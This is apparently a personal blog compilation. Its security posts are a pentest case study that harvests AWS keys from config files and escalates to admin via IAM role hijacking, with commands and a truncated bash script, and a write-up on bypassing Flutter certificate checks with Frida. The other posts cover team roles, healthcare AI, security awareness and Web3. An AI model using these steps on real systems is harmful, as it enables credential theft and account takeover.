Jimm Wayans
Red Team, Blue Team, and Purple Team

Red Team, Blue Team, and Purple Team: Understanding the Roles in Cybersecurity

, ,  –

Red, Blue, and Purple Teams are terms often used in the context of cybersecurity and information security to describe different roles and approaches in testing and improving the security of an organization’s systems and networks. Here’s an overview of each team and their respective roles:

  1. Red Team:
    • Role: The Red Team represents the attackers or adversaries. Their primary role is to simulate cyberattacks on an organization’s systems, networks, and infrastructure to identify vulnerabilities and weaknesses.
    • Activities:
      • Conduct penetration testing to exploit vulnerabilities.
      • Use hacking techniques to breach defenses.
      • Mimic real-world attack scenarios.
      • Test the organization’s incident response capabilities.
      • Provide a comprehensive report on findings and recommendations for improvement.
    • Goal: To identify weaknesses in the organization’s security posture, which can help the organization proactively improve its defenses and response capabilities.
    • Benefits: Red Team exercises help organizations identify vulnerabilities and gaps in their security measures that may not be apparent through traditional security assessments.
  2. Blue Team:
    • Role: The Blue Team represents the organization’s defenders. Their primary role is to protect the organization’s systems, networks, and data from cyber threats and to detect and respond to security incidents.
    • Activities:
      • Monitor and analyze network traffic and system logs.
      • Implement and manage security controls and tools.
      • Develop and maintain incident response procedures.
      • Investigate and respond to security incidents.
      • Continuously assess and improve security measures.
    • Goal: To maintain a strong and resilient security posture, detect and respond to threats in real-time, and minimize the impact of security incidents.
    • Benefits: Blue Team activities are crucial for day-to-day security operations, threat detection, and incident response, helping organizations defend against cyber threats.
  3. Purple Team:
    • Role: The Purple Team is a collaborative effort that combines elements of both the Red Team and Blue Team. Its role is to improve communication and cooperation between these teams.
    • Activities:
      • Conduct controlled exercises with Red Team and Blue Team members working together.
      • Share information about vulnerabilities, attack techniques, and defensive measures.
      • Test and refine incident response procedures in real-time.
      • Collaboratively assess and improve security controls.
    • Goal: To enhance the overall security posture of the organization by fostering collaboration between offensive (Red) and defensive (Blue) teams.
    • Benefits: Purple Team exercises promote a more holistic and coordinated approach to cybersecurity. They ensure that Red and Blue Teams work together to address vulnerabilities and threats effectively.

In summary, Red Teams simulate cyberattacks to uncover vulnerabilities, Blue Teams defend against threats and respond to incidents, and Purple Teams facilitate collaboration between the two to enhance an organization’s overall security posture. These teams play essential roles in proactive security testing, incident response, and continuous improvement in the ever-evolving field of cybersecurity.

#cybersecurity #redteam #redteaming #blueteam #purpleteam #InfoSec #cyberdefense

aws security

Leveraging AWS IAM Permissions for Complete Cloud Takeover: An Actual Case Study

Part 1 – AWS Security

Introduction: In this real-world case study, we delve into the enumeration and strategic utilization of AWS IAM permissions. It is strongly recommended that you familiarize yourself with my prior article explaining the intricacies of IAM permissions, despite its length, as it serves as a foundational prerequisite for comprehending the tactics employed here. Furthermore, to maintain focus on the more intricate aspects of our exploitation efforts, we will not delve extensively into the simpler vulnerabilities we encountered (some of which have been previously addressed in a separate writeup).

Throughout this study, we will explore the manual process of enumerating IAM policies and roles, as well as explore automated tools designed for this purpose, all while emphasizing the importance of not placing absolute trust in automation. Additionally, we will provide a brief tutorial on using “jq.”

Initiating Network Access: My initial point of entry into the network was discovered through a Nessus scan of a publicly accessible AWS endpoint. This scan revealed the presence of an exposed, unauthenticated ResourceManager service within a Hadoop instance. If you recall, this vulnerability was previously discussed in my writeup on Hadoop and MCollective exploitation, and it can be readily exploited using Metasploit to achieve Remote Code Execution (RCE).

Having successfully compromised this instance and swiftly establishing a couple of backdoors to ensure continued access, I commenced network scanning. Eventually, I identified a master Hadoop node with a service exposed on port 9298, accessible via an internal interface within the subnet.

I confirmed that it hosted configuration files for Hadoop and proceeded to download all the files for analysis. In AWS environments, one of the most valuable discoveries you can make is AWS access keys and secret keys, which can be located using the regular expressions provided here: https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10

AWS provides three methods for accessing resources:

  1. Through the web console
  2. Through the command line interface (CLI)
  3. Through APIs

To use the CLI, you require an access key, a secret key, and optionally a token. Access keys and secret keys can be identified using the following regular expressions:

grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' *
grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' *

After obtaining all the necessary files, I conducted a search and located a match in a file called “core-site.xml.”

Next, I employed the tool “enumerate-iam.py” to perform a brute-force analysis of the permissions available to that account.

aws enumerate

I observed that the account had the ability to list S3 buckets but did not appear to possess admin privileges. To conduct a quick privilege escalation check, I used RhinoSecurityLab’s “aws_escalate.py,” a tool I previously mentioned in my article on IAM permissions.

iam permissions

Unfortunately, it appeared that the account did not even have “GetUser” privileges. However, there were still other avenues to explore. Let’s return to the S3 route.

Pivoting for Access: We needed to configure a profile with the obtained credentials and initiate enumeration.

aws configure --profile test
aws security
aws --profile test s3 ls

aws security

aws security

There were approximately 180 buckets. We began reading them with:

aws --profile test s3 ls s3://backup-db-logs

aws security

This also presented a challenge as it turned out that the account had permissions to list the buckets but not to read them. To identify buckets that we could read, various tools were available, but we preferred to create our own scripts for better control over the process:

for i in "$@" ; do
if [[ $i == "--profile" ]] ; then
profile=$(echo "$@" | awk '{for(i=1;i<=NF;i++) if ($i=="--profile") print $(i+1)}')
AWS_ACCESS_KEY_ID=$(cat /root/.aws/credentials | grep -i "$profile" -A 2 | grep -i = | cut -d " " -f 3 | head -n 1)
AWS_SECRET_ACCESS_KEY=$(cat /root/.aws/credentials | grep -i "$profile" -A 2 | grep -i = | cut -d " " -f 3 | tail -n 1)
echo "Enumerating the buckets..."
aws --profile "$profile" s3 ls | cut -d ' ' -f 3 > /tmp/buckets
echo "You can read the following buckets:"
for i in $(cat /tmp/buckets); do
result=$(aws --profile "$profile" s3 ls s3://"$i" 2>/dev/null | head -n 1)
if [ ! -z "$result" ]; then
echo "$i" | tee /tmp/readBuckets
unset result


Invoke the script using:

bash enumerateReadBuckets.sh --profile test

aws security

We only had access to four buckets, which was a modest result. Let’s begin syncing all the information for local analysis.

for i in $(enumerateReadBuckets --profile test | tail -n +1); do aws s3 sync s3://"$i" .; done

aws security

However, our script did not return as expected. While we weren’t certain about the issue at that moment, this situation is not uncommon during penetration testing, so we proceeded with manual enumeration.

We started with our first bucket, which we’ll refer to as “bucket1.”

aws --profile test s3 ls s3://bucket1
aws security
We found a “conf” directory, which seemed promising.
aws --profile test s3 ls s3://bucket1/conf/
aws security
Wait, wasn’t “core-site.xml” the first file we discovered? Let’s download it and search for credentials.
aws --profile test s3 cp s3://bucket1/conf/hadoop/core-site.xml .

aws security

Excellent! We found new credentials. Let’s create a new profile to use them.

aws configure --profile test2

aws security

Now, let’s perform a brute-force analysis of our permissions:

./aws_escalate.py --access-key-id AKID --secret-key SK

aws securityThis new account appears to have significantly more permissions than our initial one. Let’s attempt to add a new user:

./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER

aws security

Unfortunately, we still did not obtain an admin account. However, we managed to escalate privileges manually. Let’s explore how.

aws security

Now, this is where our reasonably proficient knowledge of the AWS CLI becomes advantageous. The “aws_escalate” script relies on the “GetUser” operation to retrieve information about the current user. However, the “test2” account lacks the necessary “GetUser” permissions. Fortunately, there are alternative methods for obtaining information about the user you’re operating under. One such method involves using the Security Token Service API:

aws sts get-caller-identity

aws security

Now that we’ve identified the user, we can specify it manually:

./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER

aws security

The script might indicate that no methods are possible due to the user’s lack of permissions to execute the methods it uses. However, we were able to manually escalate privileges with this user. Let’s explore how.

Next, we need to find the ideal role to impersonate. If you recall the permissions associated with our “test2” user, many of them were related to EC2. Referring back to Rhino’s excellent blog post, we can see that method 3 actually involves using EC2:

Description: An attacker with the iam:PassRole and ec2:RunInstances permissions can create a new EC2 instance and assign an existing EC2 instance profile/service role to it. They can then log in to the instance and retrieve the associated AWS keys from the EC2 instance metadata, granting access to all the permissions associated with the assigned instance profile/service role.

Before we proceed, it’s essential to clarify that while a script is an efficient way to enumerate information, it usually cannot guarantee with 100% certainty whether privilege escalation is possible. This is because:

  1. Most privilege escalations depend on multiple factors, not all of which are straightforward to correlate.
  2. Amazon’s permissions are highly granular, meaning you might have permissions for certain actions (e.g., listing buckets) but not for others (e.g., reading the contents of those buckets).

Consider the method mentioned above. Having PassRole and RunInstances privileges alone isn’t sufficient. You also need to identify which role to impersonate and establish a connection with the instance, which might require pre-existing SSH keys or other methods. Additionally, it depends on the instance’s security group configurations. Enumerating security groups is essential to determine which one to assign to the instance or if you have privileges to create new ones.

However, granular permissions offer more opportunities than initially apparent, as we’ll explore further.

Now, the first step is to find a role suitable for hijacking. Let’s check if we can enumerate roles using:

aws --profile PROFILE iam list-roles | head -n 10

aws security

Great! We have list-roles privileges. Now, there are two criteria we need for identifying a suitable role for hijacking:

  1. The role should have an Administrator policy or a similar highly privileged policy attached.
  2. The role’s trust policy should include Amazon’s EC2 service to allow instances to assume the role.

For the first criterion, we can list the associated managed policies with:

aws --profile PROFILE iam list-attached-role-policies --role-name ROLE

We can also list the inline policies with:

aws --profile PROFILE iam list-role-policies --role-name ROLE

Let’s attempt this with the “Administrators” role as an example:

aws security

aws --profile PROFILE iam list-attached-role-policies --role-name Administrators

Great! Now, let’s try to retrieve the trust relationship document (the assume role policy) to see which entities can assume this role. We can do this with:

aws --profile PROFILE iam get-role --role-name ROLE

This command should provide the output containing trust relationship information if your account has the necessary permissions. However, in the case of the “test2” account, this information isn’t accessible.

aws security

This is the output you should get, if your account has permissionsaws security

This is the output we got with the test2 account

But remember what we discussed about granular permissions? There are often multiple ways to obtain the same information. In this case, the user didn’t have permissions to use get-role, but it did have permissions to use list-roles. Amazon’s documentation states that this call is used to list roles with a specified path prefix, and if none are found, it returns an empty list. However, this definition can be misleading. With this call, you can specify the --path-prefix to search for roles with a specific prefix. If you omit it, it defaults to a slash (“/”), effectively obtaining a list of all roles—replacing the need for get-role for our specific use case. Anyways, let’s give it a try:

aws --profile PROFILE iam list-roles

aws security

Great! Now, we need a way to list the roles that have an assume role policy with AWS EC2 as a trustee. To filter these roles, we’ll use jq, a tool for parsing JSON output. To explain how to use it, let’s break it down step by step. First, let’s examine the structure we need to parse. Let’s consider one role from the output:

aws security

The information we need is listed under “Principal,” and it should look something like:

"Principal": {
"Service": "ec2.amazonaws.com"

Let’s select only the fields we’re interested in with:

aws --profile test2 iam list-roles | jq -r '.Roles[] | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'

This command will filter for the RoleName and the Principal Service.

aws security

However, the output may not match the example we provided earlier because not all results will look exactly the same. Some might involve a different Principal, such as a Federated Principal:

This complexity makes parsing the output a bit harder, but not impossible. Let’s filter only the elements where “Principal.Service” is not null:

aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'

We’re getting closer. Now, let’s refine the results:

aws security

aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' | grep -B 1 "ec2.amazonaws.com" | grep -v "ec2.amazonaws.com" | sort -u | uniq

This command will retrieve all the results where “Principal.Service” is present, along with the Role Name. It will then remove the unnecessary “ec2.amazonaws.com” entries and sort and remove duplicates.

aws security

Now, we have identified potential candidates for instance role hijacking. The next step is to get the associated policies for each candidate using list-attached-role-policies and list-role-policies, as mentioned earlier. After a few minutes, we find a role with an Administrator policy attached. For the sake of illustration, let’s call it “danger-role.” It’s quite evocative and reminds me of “danger-zone,” which I appreciate as an Archer fan.

aws security

 #aws #awssecurity #webapsecurity #cloudsecurity

End of part 1, aprt 2 coming soon….

Bypassing Root CA Checks in Android Apps Built with Flutter

Android App Security:

In this post, I will explore the topic of bypassing Root Certificate Authority (CA) checks in Android applications developed using the Flutter framework. Although it is important to note that bypassing these security measures is generally not recommended, I aim to provide insights into the technical aspects for educational purposes only.

Understanding Root CA Checks:
Root CA checks are a fundamental security measure in Android applications that validate the authenticity and integrity of SSL/TLS connections. These checks ensure that the server’s certificate is issued by a trusted CA and has not been tampered with. Bypassing these checks allows one to perform Man-in-the-Middle attacks, such as using BurpSuite.

Limitations in Flutter:
Flutter, as a cross-platform framework, leverages platform-specific APIs for networking operations. However, as of the latest update, Flutter does not provide direct access to low-level networking APIs, making it difficult to bypass Root CA checks solely within the Flutter framework.

Recently, I delved into Android applications developed using the Flutter framework, which was a new territory for me. While engaging in a discussion unrelated to app testing, I stumbled upon an app to analyze. Excited about the opportunity, I launched the app on my mobile device, connected it to a testing WiFi network and fired up burpsuite, and soon encountered a familiar challenge faced by app testers.


Wonderful! They’re doing something right by preventing Burps root CA from being used and I could probably bypass this with Frida. I pulled the .apk apart and found…

Flutter App Pentest

After a bit of reading about the Flutter Engine it seems the majority of the work is performed by “libflutter.so”. This was made more apparent after starting “frida-trace” and setting up intercept scripts for all the usual SSL methods that you’d need to bypass, although they libraries were loaded I didn’t see a single call to any of the methods and the SSL connection still failed to start.

So I dug further, after some further research I found out that Flutter bundles the BoringSSL libraries into “libflutter.so” and performs its own verification steps rather than trust the OS’s systems. It also forces the use of a known set of Root certificates which goes someway to explain why I couldn’t MITM the connection.

In summary, Flutter integrates BoringSSL into “libflutter.so” and implements its own SSL verification steps, bypassing the OS’s SSL mechanisms. The enforced use of trusted Root certificates and the challenge of analyzing the stripped library make it essential to monitor logcat output for insights into the SSL connection process. These findings are valuable for security assessments and custom SSL handling in Flutter-based Android apps.

Breaking out Ghidra and loading the shared object wasn’t much better as the library had been stripped of symbols, making it tough to find the verification functions. I fired up the app again and watched the output of logcat to see if it gave me any clues:

Flutter App Pentest

See the line containing “handshake.cc”? After some trawling through strings and references in Ghidra I found some methods that contained it:

Flutter App Pentest

The 0x160 seems to correspond to the line number in the source that generate the error, I grabbed the BoringSSL code and started looking for x509 verification functions. One cropped up in “ssl_x509.cc”:

Flutter App Pentest

Searching Ghidra for this file name showed up the full path string as expected, tracing cross-references to that string dumped me in the middle of a call to “FUN_00316500” above with a line number value that roughly matched the source file. Bingo!

To get this check to pass all I’d have to do would be:

      1. Calculate the actual address of the function in the phones memory
      2. Build a Frida Interceptor script to trap it
      3. Alter the return value to “true”

Calculating the offset of the function could be done by finding the Virtual address of a function we know the name of, working out the target functions offset from it and then adding that to the the actual address of the first function.

The Flutter shared object exports one function, “JNI_OnLoad” which is called by the Android runtime during startup, Frida could find the address of this easily so that made for a good base-function to start with. The offset of the X509 function from this could be calculated and added to the base address easily, setting up an interception for this showed repeated calls to the method whenever I forced the app to make a request:

Flutter App Pentest

See how the “ret” value is “0x0”? Lets patch that out:

Flutter App Pentest

Problem solved!

Flutter App Pentest

This was definitely a much harder one to crack than most apps, I’m expecting people will hide behind that as a form of “security” and forget to secure the API’s the app interfaces with 🙂

I grabbed a few more Flutter apps and check the MD5 hashes of their “libflutter.so” files, it appears they differ in most cases which means that each app will need the offset of “ssl_crypto_x509_session_verify_cert_chain” calculating, I’m not sure if this can be automated or not given the lack of debug symbols but honestly its not that much of a problem for testing only a single app.

#FlutterApp #Androidsecurity #Applicationsecurity #infosec


Application of AI, Machine Learning and Data Analytics in Healthcare.

Application of AI, Machine Learning and Data Analytics in Healthcare.

The combination of AI, machine learning, and data analytics provides researchers and scientists with powerful tools to process and interpret large volumes of complex healthcare data. Here’s how these technologies work together:


  1. Data Processing and Integration: AI, machine learning, and data analytics techniques can handle large volumes of healthcare data, including patient records, genetic information, medical images, and research articles. These technologies can process and integrate diverse data sources, ensuring that relevant information is captured and organized for analysis.
  2. Pattern Recognition and Data Mining: Machine learning algorithms can identify patterns, trends, and correlations within the data. By training the algorithms on a vast amount of healthcare data, they learn to recognize complex relationships and indicators that may be difficult for humans to detect. This enables researchers to uncover valuable insights and potential associations between variables.
  3. Feature Extraction and Selection: Machine learning algorithms can automatically extract relevant features from healthcare data. For example, in genetic data, algorithms can identify specific gene variants or mutations that may be associated with rare diseases. Feature selection techniques help researchers identify the most informative and predictive features for accurate diagnostics or research purposes.
  4. Predictive Modeling and Decision Support: Machine learning models can be developed to predict outcomes, such as disease diagnoses or treatment responses, based on the available data. These models can assist researchers and clinicians in making informed decisions by providing evidence-based recommendations or predictions. This decision support can aid in early diagnosis, personalized treatment planning, and improving patient outcomes.
  5. Data Visualization and Interpretation: AI and data analytics tools offer visualization techniques that facilitate the interpretation of complex healthcare data. Graphs, charts, and interactive dashboards can present the data in a visually meaningful way, enabling researchers to understand trends, relationships, and anomalies more easily. Visual representations can help communicate findings and support data-driven decision-making.
  6. Continuous Learning and Improvement: AI and machine learning algorithms have the ability to continuously learn and adapt. As researchers incorporate new data and insights, the algorithms can update their models and refine their predictions. This iterative learning process improves the accuracy and effectiveness of the analyses over time, enabling researchers to uncover new knowledge and refine their understanding of rare diseases.

By leveraging AI, machine learning, and data analytics, researchers and scientists can effectively process, integrate, and interpret large volumes of complex healthcare data. These technologies enable them to discover meaningful patterns, make predictions, gain valuable insights, and support evidence-based decision-making in the field of rare disease diagnosis and research.

Talking about Information Security Awareness

Information Security Awareness

In the current society, with the rapid development of new-generation information technologies such as artificial intelligence and big data, people’s lives have become more and more convenient and fast. However, when we enjoy technological life, we don’t realize that we have been exposed to dangers such as information fraud, information capture and information harassment. Compared with the traditional means of fraud in the past, today’s criminals take advantage of the efficiency of technology to take advantage of network security loopholes to carry out fraud, making people even more difficult to guard against. Perhaps it is some small negligence in life that may cause personal information leakage and cause information security risks.

information security awareness

The information security has changed people’s work, study and living habits, making people more dependent on computer networks. While enjoying the various conveniences brought by the information security, people often lack information security awareness and ignore information security guarantees. People’s information security awareness is gradually established through the awareness and understanding of information security. This post analyzes and discusses the connotation of information security awareness and the current situation of information security development, and puts forward effective measures to strengthen information security awareness.

The importance of information security

Information security is the cornerstone of informatization construction and the guarantee for the normal operation and effectiveness of information networks. Information security has become an overall problem affecting national security, social stability and economic development. A country’s ability to obtain information and ensure information security is a symbol of comprehensive national strength, economic competitiveness and viability in the 21st century, and a “killer copper” for future international competition. The development of society and the arrival of the digital network era have changed many aspects of people’s lives. The universal deposit and withdrawal of bank deposits, deposits and withdrawals in different places, surfing the Internet, online shopping and online transactions all bring convenience to people’s lives. But while computers and networks bring convenience and speed, it also imposes some conditions. Nowadays, people have less cash in their pockets and more various cards, such as bank credit cards, medical and social security cards, salary cards and so on. These cards really make people convenient, but just because these cards are so convenient that when people use them, the computer system only recognizes the cardholder and does not identify the real owner of the card, so people have to for the safety of the information on the card Set passwords and more for various cards. This is an information security issue. People set various passwords for the security of their information.

With the development and popularization of the Internet, network viruses, network attacks, and network crimes have rapidly reached an unprecedented rampant level. Today’s viruses can spread rapidly across the world within ten minutes, disrupting the global economy in an instant. Network security has become the focus of global attention, and hackers and computer viruses are threatening the normal operation of various departments. When people increasingly rely on computer networks, they find that the network is so fragile. Therefore, information security has been paid more and more attention all over the world, and information security has become an important symbol to measure whether an information system is perfect.

The International Organization for Standardization (ISO) defines information security as “technically and managerially established security protection for data processing systems to protect computer hardware, software and data from damage, change and disclosure due to accidental and malicious reasons”.

Main content of information security

The main contents of information security include: confidentiality, integrity, availability, authenticity and validity.

Information security mainly refers to the maintenance of confidentiality, integrity and availability of information, that is, the use of computer software and hardware technology, network technology, key technology and other security technologies and various organizational management measures to protect information during its life cycle. In all links of generation, transmission, exchange, processing and storage, its confidentiality, integrity and availability will not be destroyed.

Confidentiality means: Ensuring that only those who have been granted specific permissions have access to information. The confidentiality of information varies according to the number of objects that are allowed to access the information. The information that everyone can access is public information, and the information that needs to be restricted from access is sensitive information or secret information. According to the importance of the information and confidentiality requirements, the information is divided into Different levels of confidentiality, such as internal military documents are generally divided into three levels: secret, confidential and top secret. Authorized users can operate confidential information according to the authorized operation rights. Some users can only read information, and some users can both read and write.

Integrity of information means: to ensure the correctness and completeness of information and processing methods. On the one hand, information integrity refers to the fact that no tampering, loss of information, or wrong information occurs in the process of using, transmitting, and storing information; on the other hand, it refers to the correctness of information processing methods, improper operations, and It may cause loss of important files, or even paralysis of the entire system.

Availability of information refers to ensuring that authorized users can indeed access the information they need when they need it. That is, information and related information assets can be obtained immediately when the authorized person needs them. For example, interruption of communication lines and network congestion will cause information to be unavailable for a period of time and affect normal business operations. This is the destruction of information availability. Systems that provide information must be able to withstand attacks appropriately and recover from failure. In addition, the authenticity and validity of information must be guaranteed, that is, business transactions and information exchanges between organizations or between organizations and partners are trustworthy.

Information Security Development Status

Information security can be regarded as an emerging industry in the process of my country’s informatization construction. In general, the development trajectory of information security includes the following three stages:

⑴The budding stage

Before 2005, various industries and departments in China began to develop awareness of information security: from the initial “emphasis on information construction” but “ignoring the construction of security systems” to “awareness of the importance of security” and “hope to realize information security” Security”, but think that information security is very mysterious, and do not know where to start. At this stage, customers in various industries are consciously learning and accumulating information security knowledge, and conducting extensive exchanges with authorities in this field to understand their technologies, concepts, products, and services. At the same time, some small-scale and sporadic information security constructions have also appeared in some enterprises and departments, but they have not achieved scale and systematization; moreover, for information security in this period, the government’s macro-policy is more appealing. There are many, but there are relatively few specific affairs to be promoted. Although it seems very lively, there are very few actual information security constructions.

⑵ outbreak stage

After 2005, the needs of various domestic industries and departments for information security construction have changed from “spontaneous” to “conscious”. The customer has basically understood the construction content and significance of information security. Many industry departments have begun to plan and deploy internal information security construction. Leaders of various industries attach great importance to it and continue to increase investment. Therefore, information security has become the top priority of this phase of construction. In a sense, the explosion of demand in the information security market can be said to be caused by the “debts” of various industries in information security over the years.

⑶ popularization stage

When information security construction is integrated with the overall information construction of various industries, information security is one of the key links in IT construction. It is as important and ubiquitous as air, but it is not easy to be noticed.

In 3 to 5 years from now, the information security market will maintain a high-speed and super-scale development momentum, and telecommunications, government, and finance will be the industries with the greatest demand for information security. Because the telecommunications industry and the financial industry are industries with large investment, fast development, high degree of informatization, complex needs, and relatively severe security situation, while government departments play a role model to the outside world due to their high position and urgent security needs, so There will also be increased investment in information security.

The biggest security issue in the 21st century is information security, as well as economic security, political security, military security, social security, technological security, and cultural security based on information security. The weakest link in information security is likely to be careless people, not software bugs. Hackers have captured many extremely complex networks, not only relying on superb technology, but also exploiting human weaknesses. Only by raising people’s security awareness to a very high level can we fundamentally reduce the risk of information security.

Effective Measures to Improve Information Security Awareness

A good information security environment is the need to further deepen reform and opening up and promote my country’s socialist modernization, and it is also the foundation of national security. The premise of a good information security environment is that all citizens must have a strong awareness of information security and a high degree of vigilance in protecting sensitive national information.

1. Improve the information security awareness of leading cadres

Leading cadres at all levels are not only the main body of generating, transmitting, utilizing and storing sensitive information, but also the main target of stealing sensitive information. Therefore, to improve the awareness of information security, the quality of information security of leading cadres at all levels is particularly important. Because only when leaders raise their awareness of information security can they seriously grasp information security work, strictly implement various laws and regulations, and strictly organize and implement information security inspections, can information security work be effective and well done.

2. Improve the information security awareness of confidential personnel

Secret-related personnel are important managers of secret information security, and are responsible for sending, receiving and keeping confidential secret information. Doing a good job in the team building of secret-related personnel and improving their quality is the key to doing a good job in information security. To improve the quality of secret-related personnel, in addition to improving ideological understanding, cultivating a scientific and rigorous style of work, and strictly abiding by laws and regulations and various rules and regulations, professional training on information security and confidentiality under high-tech conditions is required to enable them to master the use of modern technical tools to manage documents. Knowledge of archives, familiarity with their own business, high judgment and insight into phenomena that may cause leakage of secrets, and mastering a certain level of anti-theft technology. 3. Improve the information security awareness of professional and technical personnel

Professional and technical personnel are the new force of information security management in our country and the operators and maintainers of information security. Professional and technical personnel must have sufficient information security knowledge, fully understand the security performance of relevant security technologies, operating systems, and application software, keep track of security news and security technology developments, and develop good information security habits. The government should actively promote exchanges between my country’s information technology professionals and foreign countries in the cultivation of information security awareness. Learning from foreign successful experience, using foreign research results, drawing on foreign educational strength, and introducing foreign excellent teaching materials and related theories is a shortcut to rapidly improve the training level of information security awareness of professional and technical personnel in our country.

3. Raise the awareness of information security of the whole people

In order to enhance the citizens’ awareness of information security and improve the awareness of national information security, it is necessary to carry out information security education for the whole people. In order to ensure the security of the party and the state’s secrets under any circumstances, the most fundamental thing is to do a good job in ideological education and improve the information security awareness of the whole people. All industries and government information management departments at all levels should use public opinion and media to publicize the importance of information security; compile information security knowledge manuals to strengthen self-protection capabilities in information security; establish a set of security training systems for users of different levels. Gradually improve the technical level of computer users through hierarchical training; organize the study of laws and regulations on information security work, popularize common sense of information security, and introduce information security technologies. Only when the information security awareness of the whole people is enhanced, information security will be fully guaranteed.

What is Web3

What is Web3

What is Web3

First, lets see the previous generations:


The first wave of the Internet began in the 1980s, and the iconic event was that two computers “communicated” through the customs clearance protocol. This protocol is the TCP/IP protocol created in 1983.

The network (World Wide Web) in this period can’t do too much “interconnection”, and more information is read-only.

Netscape (Netscape) is typical of this period, publishing information on the Internet.

The network in this period had the following pain characteristics:
  • High barriers to access technology
  • Index function without information
Can’t interact with users, can’t record user data

Web2.0 (2001-present)

After the dot-com bubble burst in 2000, a second wave began to sprout. Many companies have begun to improve the pain points of the Web1.0 model, including search functions and allowing users to upload content.
The Web 2.0 products that emerged at this time were more interactive, and users could create, upload and share their content.
Examples of this include Google and Microsoft building their Gmail and Outlook products on top of SMTP (Mail Transfer Protocol) in 1981. While the SMTP protocol itself is open and transparent, Gmail and Outlook are closed platforms owned by the two tech giants. Therefore, the software that Web2 users are actually interacting with is the product built by these technology giants based on Web1 open source software.
Facebook (now renamed Meta) is a typical Web2 technology giant. It creates wealth by allowing users to read, write, interact and socialize on the platform, depositing a large amount of data and traffic.

Web 3.0 (concept was born in 2014)

Web 3.0 (hereinafter referred to as Web3), was first proposed by Gavin Wood, the co-founder of Ethereum, in 2014, and it suddenly attracted everyone’s attention at the end of 2021.
Web3 includes the characteristics of Web1 and Web2: transparent, open and open source network, users can read, write and upload content, and can also exchange value.
From a conceptual understanding, Web3 represents the next era of the Internet, and the Internet is shifting towards a more democratic paradigm. Web3 also stems from the change in people’s attitude towards the value of the Internet today: the giants of Web2.0 control the Internet and everyone’s data, so many people have the idea of ​​​​creating a truly “collectively owned” Internet.
The core of Web3 is to allow users not only to read and write content, but also to own their own content, so that they will not be swayed by centralized technology companies arbitrarily modifying the rules. Web3 restores the openness of Web1, and the rules of all market participants are standardized, so that large airliner companies will not stifle innovation and market competition.
The corporate form under Web3 has also changed:

Comparison of Web2 products and Web3 products

Next, let’s compare two content creation products (Medium and Mirror) to see the differences between Web2 and Web3 products.
Is Medium Worth Using | Journal
Medium is the world’s top content creation/blogging platform (a bit similar to Zhihu in China but with better content quality) . The founder Evan Williams is also the co-founder of Twitter and Bolgger. As of May 2021, the platform has 180 million monthly live and 750,000 paid subscribers*.
Compared with traditional blogging platforms, its biggest feature is that it refines the writing and reading experience, and at the same time it mainly shares and disseminates content based on users’ social relationships.
Creators do not need to pay any fees for uploading works, but if they want to earn income through content, they need to add the content to the paywall section.
Readers are free to read general content, but they need to pay a monthly membership fee of $5 or $50 per year to read the content in the paywall section.
Medium will distribute the reader’s membership fee to the authors who have read the article according to the calculated ratio according to the parameter of the reader’s reading time. The monthly income of top content creators may exceed 50,000 US dollars. The platform will also give top creators additional subsidies every month to encourage creators to continuously produce high-quality content and expand the number of fans.
Medium is currently valued at $600 million, and its most recent financing was $57 million in January 2021 from A16Z and Google.
Mirror is a blockchain-based content creation platform whose mission is to “revolutionize the way ideas are expressed, shared, and monetized.” As long as you have an Ethereum wallet, you can access the platform to create and enjoy benefits. Their goal is to provide a way for content creators to publish their work confidently and securely, while maintaining control over digital rights.
Mirror was founded by Denis Nazarov, a former partner of A16z (also an investment institution of Medium). It received a US$10 million investment from Union Square Ventures in July 2021 and is currently valued at US$100 million.
As of March 2022, Mirror has raised more than 8,000 Ethereum (approximately $24 million) for content creators.
The following figure is the interface of entering Mirror after linking the wallet:
Mirror currently provides basic functions for creators, including publishing articles (Entry Editor), crowdfunding (Crowdfunds), digital collections (Editions), auctions (Auctions), and splits (Splits).
Crowdfunding: Anyone can initiate or participate in crowdfunding through Mirror. Supporters can deposit Ethereum tokens (ETH) to fund the initiators and exchange tokens. Any project or idea can be capitalized (tokenized). Many writers have launched crowdfunding projects on Mirror, using future copyright/royalty income to obtain current funds to maintain their creation and life.
Digital collection (NFT): All content published on Mirror can be made into NFT after paying a certain handling fee.
(NFT literally means non-homogeneous tokens. Traditional encrypted digital currencies are homogeneous (Fungible Token), there is no difference between any two tokens, they can be replaced with each other, and can often be split into smaller units. For example, Bitcoin. NFT is unique and cannot be replaced by other NFTs, and often cannot be divided into smaller units. For example, an NFT of a painting represents the painting itself and cannot be replaced by other NFTs. Blockchain technology It is a decentralized digital ledger technology, and NFT is a way of digitizing assets based on blockchain technology. In actual scenarios, NFT does not refer to a specific form of digital assets. On the contrary, the scope of NFT It is very broad and can be in any form you can imagine, such as pictures, music, videos, online collections, or even a tweet. Any information such as the creation, modification, and transaction of these NFT digital assets will be recorded one by one on the digital ledger of the blockchain.)
Auctions: NFT auctions can be supported on Mirror.
Ledger sharing: Ledger sharing on Mirror is an automatic way to share the value you generate with multiple entities. A split is a payable smart contract that transfers value to multiple addresses on Ethereum. Sharding can be a way to reward your collaborators, people who motivate you, or donate the proceeds of your work.
From the perspective of product form, the Mirror platform is more like a content crowdfunding platform. The digital content published on it is endowed with value through NFT tokenization, and the ownership of a single piece of content can be sold to multiple parties through crowdfunding. name investors.
The set of tools provided by Mirror for content creators has raised “content monetization” to a new level, and there will even be special content investors who can earn future profits through their keen sense of high-quality creators.
At the same time, the Mirror platform solves the following problems through blockchain technology:
  • Content is censored and deleted
  • Malicious comments
  • The content is randomly quoted or plagiarized
  • The economic interests of creators are determined by the platform
Exclusive ENS domain name: Mirror does not need to log in through email or other accounts, but integrates the decentralized domain name service ENS* to realize the creator’s right. The mirror.xyz subdomain name at the beginning serves as the home page of its own content publishing platform. All information is publicly viewable on the blockchain, so anyone can verify whether an item of content was written by a specific Ethereum account.
